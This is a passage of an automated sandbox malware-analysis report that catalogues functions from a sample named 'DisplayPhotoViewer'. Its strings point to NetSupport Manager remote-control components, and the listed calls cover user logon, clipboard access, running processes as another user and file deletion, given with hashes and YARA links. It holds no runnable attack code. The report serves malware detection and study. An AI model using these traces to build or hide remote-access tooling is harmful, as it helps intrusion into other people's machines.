                                                                                                    • String ID: ..\ctl32\nsmdlg.cpp$Error. NSMDialog!CreateModal has invisible parent$hGlobal || !"Unable to load resource"$hRsrc || !"Unable to find resource"$m_attached == NULL$pDlgTemplate || !"Unable to lock resource"
                                                                                                    • API String ID: 2167286109-1263985265
                                                                                                    • Opcode ID: fe06b98fa4af126c2873b655e0d218807ea2e3a7387f91f75aba942c8ab63bc5
                                                                                                    • Instruction ID: 4b268077d53f9e6000ba96f399470a05e12971b26c564414febea3e2638d5111
                                                                                                    • Opcode Fuzzy Hash: fe06b98fa4af126c2873b655e0d218807ea2e3a7387f91f75aba942c8ab63bc5
                                                                                                    • Instruction Fuzzy Hash: 68619675E0060AABD701DFA5DC84F9FB7B8AF84718F1085A9F915E7245EB34F5008BA1
                                                                                                    Function 110391A0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 189COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _calloc.LIBCMT ref: 11039286
                                                                                                    • _free.LIBCMT ref: 11039380
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                      • Part of subcall function 110C7F50: FindResourceExA.KERNEL32(00000000,00000005,?,00000000), ref: 110C7FD5
                                                                                                      • Part of subcall function 110C7F50: LoadResource.KERNEL32(00000000,00000000), ref: 110C8004
                                                                                                      • Part of subcall function 110C7F50: LockResource.KERNEL32(00000000), ref: 110C8028
                                                                                                      • Part of subcall function 110C7F50: CreateDialogIndirectParamA.USER32(00000000,00000000,1104DFC6,110C6770,00000000), ref: 110C8059
                                                                                                      • Part of subcall function 110C7F50: CreateDialogIndirectParamA.USER32(00000000,00000000,1104DFC6,110C6770,00000000), ref: 110C8074
                                                                                                      • Part of subcall function 110C7F50: GetLastError.KERNEL32 ref: 110C8099
                                                                                                    • _calloc.LIBCMT ref: 11039395
                                                                                                    • _free.LIBCMT ref: 110393D0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Resource$CreateDialogIndirectParam_calloc_free$ErrorFindLastLoadLock_malloc_memsetwsprintf
                                                                                                    • String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
                                                                                                    • API String ID: 2195741704-1552251038
                                                                                                    • Opcode ID: a335a084d689679c10410774422ffd3118dd5cd7ab3bc0a1b0a2b291840903c7
                                                                                                    • Instruction ID: 4086767be7b95815a8b87adeca8a1087e66975d2fdd9eacf41386359a10bf509
                                                                                                    • Opcode Fuzzy Hash: a335a084d689679c10410774422ffd3118dd5cd7ab3bc0a1b0a2b291840903c7
                                                                                                    • Instruction Fuzzy Hash: 976104B5E54616AFD701DFA0CCC0FADB3A0EF84719F104269E9265B3D0EBB16980C782
                                                                                                    Function 11103360 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 85fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 11103385
                                                                                                    • wsprintfA.USER32 ref: 111033A9
                                                                                                    • FindFirstFileA.KERNEL32(?,?,00000000), ref: 111033C6
                                                                                                    • wsprintfA.USER32 ref: 11103402
                                                                                                      • Part of subcall function 11159EA0: DeleteFileA.KERNEL32(?,?,111522DC,?), ref: 11159EA8
                                                                                                      • Part of subcall function 11159EA0: GetLastError.KERNEL32(?,111522DC,?), ref: 11159EB2
                                                                                                      • Part of subcall function 11159EA0: __dosmaperr.LIBCMT ref: 11159EC1
                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 1110341B
                                                                                                    • GetLastError.KERNEL32 ref: 1110343B
                                                                                                    • FindClose.KERNEL32(00000000), ref: 1110345B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$ErrorLastwsprintf$CloseDeleteFirstNext__dosmaperr_memset
                                                                                                    • String ID: %s\%s$%s\*.*$.$rmdir(%s) ret %d, errno=%d, lasterr=%d
                                                                                                    • API String ID: 3263656767-2664646196
                                                                                                    • Opcode ID: 3b8f3e68857d2d4d5fcedd3b5ea9a60a67ccb2e3a7f69852d6573a2c97759908
                                                                                                    • Instruction ID: cf9f743203e2a23cfd4e8d90bfdbf3fe1bbd3cd6a687f32fbdc73053cc0a656c
                                                                                                    • Opcode Fuzzy Hash: 3b8f3e68857d2d4d5fcedd3b5ea9a60a67ccb2e3a7f69852d6573a2c97759908
                                                                                                    • Instruction Fuzzy Hash: 8121D8BAD112246BDB52DF64DC88FEEF7BC9B49308F0041A8E91997141F774AB84CB61
                                                                                                    Function 11031570 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                                    • API String ID: 0-293745777
                                                                                                    • Opcode ID: 2e0e51da2579283ce9c57ec42524f3efbcaf938c7d324a83d20cdd8291c19af9
                                                                                                    • Instruction ID: a78f3a660f14f01d53fcd2939d51c488e34b6a73c0896110cc3ba89edf073858
                                                                                                    • Opcode Fuzzy Hash: 2e0e51da2579283ce9c57ec42524f3efbcaf938c7d324a83d20cdd8291c19af9
                                                                                                    • Instruction Fuzzy Hash: D1A1C135F102059FD750DBA5DC91FAAB3B5EFC970AF10419DEA4A9B280EB31B901CB91
                                                                                                    Function 110ED440 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 110ED44F
                                                                                                    • LogonUserA.ADVAPI32(?,00000000,?,?,?,FFFFFFFF), ref: 110ED4FE
                                                                                                    • GetTickCount.KERNEL32 ref: 110ED506
                                                                                                    • GetLastError.KERNEL32 ref: 110ED53E
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountErrorLastTick$ExitLogonMessageProcessUserwsprintf
                                                                                                    • String ID: IsA()$LogonUser(%s, %s) took %d ms, ret %d$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$null
                                                                                                    • API String ID: 307273675-931856353
                                                                                                    • Opcode ID: 626212a95fd8a79f4c99d9a346964a5706acebf1686333d03147c27613f49f55
                                                                                                    • Instruction ID: 82ef7d15e9b14f072953cdb22b61fd3da3fec28d419b9bf44d0beb19ea222cae
                                                                                                    • Opcode Fuzzy Hash: 626212a95fd8a79f4c99d9a346964a5706acebf1686333d03147c27613f49f55
                                                                                                    • Instruction Fuzzy Hash: 1331A2B9A00A06AFD710DF5AD888E5BF7F9FF98318B108159E85997350E730F905CBA0
                                                                                                    Function 111533D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11153370: GetVersionExA.KERNEL32(?), ref: 1115339E
                                                                                                    • _memset.LIBCMT ref: 111533ED
                                                                                                      • Part of subcall function 11153280: FindWindowA.USER32(00000000,00000000), ref: 111532CA
                                                                                                    • CreateProcessAsUserA.ADVAPI32(00000000,?,?,75BF7B80,0B2326C8), ref: 11153423
                                                                                                    • GetLastError.KERNEL32(?,75BF7B80,0B2326C8), ref: 1115342F
                                                                                                    • WinExec.KERNEL32(?,00000001), ref: 11153438
                                                                                                    • CloseHandle.KERNEL32(?,?,75BF7B80,0B2326C8), ref: 11153459
                                                                                                    • CloseHandle.KERNEL32(111537B5,?,75BF7B80,0B2326C8), ref: 1115345F
                                                                                                    • WinExec.KERNEL32(?,00000001), ref: 1115346F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseExecHandle$CreateErrorFindLastProcessUserVersionWindow_memset
                                                                                                    • String ID: D
                                                                                                    • API String ID: 4112535333-2746444292
                                                                                                    • Opcode ID: ee08a1fab5bd3212d4cda7f4f796d318be445dce19d67ebb5ca42c48f8cfc531
                                                                                                    • Instruction ID: 6edb9f54fdcd4f2c91ccb4d41e9a6f02da4056e67d9a63584d83a24ff9daa757
                                                                                                    • Opcode Fuzzy Hash: ee08a1fab5bd3212d4cda7f4f796d318be445dce19d67ebb5ca42c48f8cfc531
                                                                                                    • Instruction Fuzzy Hash: F41138767502196BDB20DBF8EC45FAEB368DB84B04F108125FF19EB2C4D9B0A40487E1
                                                                                                    Function 110311C0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87clipboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsClipboardFormatAvailable.USER32(?), ref: 11031201
                                                                                                    • GetClipboardData.USER32(?), ref: 1103121D
                                                                                                    • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 1103129C
                                                                                                    • GetLastError.KERNEL32 ref: 110312A6
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 110312C6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                                                    • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                                                    • API String ID: 1861668072-1296821031
                                                                                                    • Opcode ID: 7fb89025581069bdcf35070ac69ac1d1e427d8eec964e9236c398e85b8c4ee47
                                                                                                    • Instruction ID: eadcb4ebb7396660cd31340bb2b7f48e3c32a37211be3cdd70676a935022b8ce
                                                                                                    • Opcode Fuzzy Hash: 7fb89025581069bdcf35070ac69ac1d1e427d8eec964e9236c398e85b8c4ee47
                                                                                                    • Instruction Fuzzy Hash: 7C21B571A2015A9FCB01DFE9E8809BEF7F8EF8D719F4040AAEC15D7240DA3199118B91
                                                                                                    Function 1070E704 Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000000,00000080,00000000,?,?,00000001), ref: 1070E73A
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000001), ref: 1070E74D
                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,00000000,00000080,?,?,00000000,00000080,00000000,?,?,00000001), ref: 1070E774
                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000080,00000000,?,?,00000001), ref: 1070E79D
                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?), ref: 1070E7E0
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000220,?,000000FF,?,?,00000000,00000000,?,?,?,?), ref: 1070E806
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1691099609-0
                                                                                                    • Opcode ID: 7e7bbbfe3c6b28ae33c670cf63860e04bf6c604ceb6828c0a52124bd8263ff25
                                                                                                    • Instruction ID: 6bad95b4840c4dcaf3998a9b1e50be7531795b6ff257536d36cc027ec05cac4d
                                                                                                    • Opcode Fuzzy Hash: 7e7bbbfe3c6b28ae33c670cf63860e04bf6c604ceb6828c0a52124bd8263ff25
                                                                                                    • Instruction Fuzzy Hash: 74314B31A01229FBCF628F55CC89A8F7FA9FB0ABA0F108A15F515A51E4D7708950DBE1
                                                                                                    Function 1070E5F1 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,?,10715E60,00000001,00000004,00000000,?,?,00000001), ref: 1070E627
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000001,00000000,00000000,?,10715E60,00000001,00000004,00000000,?,?,00000001), ref: 1070E63A
                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,00000000,00000004,?,10715E60,00000001,00000004,00000000,?,?,00000001), ref: 1070E661
                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,00000000,00000000,?,10715E60,00000001,00000004,00000000,?,?,00000001), ref: 1070E686
                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,10715E60,?,10715E60,00000001,00000004,00000000,?,?), ref: 1070E6C7
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,000000FF,00000000,00000004,?,10715E60,?,10715E60,00000001,00000004,00000000,?,?), ref: 1070E6E8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1691099609-0
                                                                                                    • Opcode ID: 6271b2e01a5bf319f6370c90b93506c5df92b63f566820cf2fbbea478ce06ac5
                                                                                                    • Instruction ID: 84a5001fc4db201296a625aa3e476951f052089fe19a65eef1dd580f0715c1a1
                                                                                                    • Opcode Fuzzy Hash: 6271b2e01a5bf319f6370c90b93506c5df92b63f566820cf2fbbea478ce06ac5
                                                                                                    • Instruction Fuzzy Hash: 7731D131A00269FBCF628F55DC89F9F7FB5FB5AB90F108A19F811A11A4D3728850DB94
                                                                                                    Function 11157561 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 11161447
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1116145C
                                                                                                    • UnhandledExceptionFilter.KERNEL32(111B53C0), ref: 11161467
                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 11161483
                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 1116148A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 2579439406-0
                                                                                                    • Opcode ID: c9fea3f99d28007ee1d046f727e3519cc0a848400dffe03d16d24a66a6d7ca6c
                                                                                                    • Instruction ID: 7c7fcc348ea41e253e3abc31e65c406ce9bbda84a24d4b4c4f59504c427db7e4
                                                                                                    • Opcode Fuzzy Hash: c9fea3f99d28007ee1d046f727e3519cc0a848400dffe03d16d24a66a6d7ca6c
                                                                                                    • Instruction Fuzzy Hash: AF21BD78807326DFC786DFD5D1C4668FBA4BB08309F508129F9299B359F7B05981CB45
                                                                                                    Function 110BB710 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(000000FF), ref: 110BB79D
                                                                                                    • ShowWindow.USER32(000000FF,00000009,?,11059DC3,00000001,00000001,?,00000000), ref: 110BB7AD
                                                                                                    • BringWindowToTop.USER32(000000FF), ref: 110BB7B7
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110BB7D8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$BringCurrentIconicShowThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 4184413098-0
                                                                                                    • Opcode ID: 31494d892e8100fcbfaa23e70e384c7c1f6a499a1b18dbbc48b2bf6a2173a498
                                                                                                    • Instruction ID: a0c4440e808d33b79f7ecfaf84325f8980d896f28aecb9145359e8943c2f05a4
                                                                                                    • Opcode Fuzzy Hash: 31494d892e8100fcbfaa23e70e384c7c1f6a499a1b18dbbc48b2bf6a2173a498
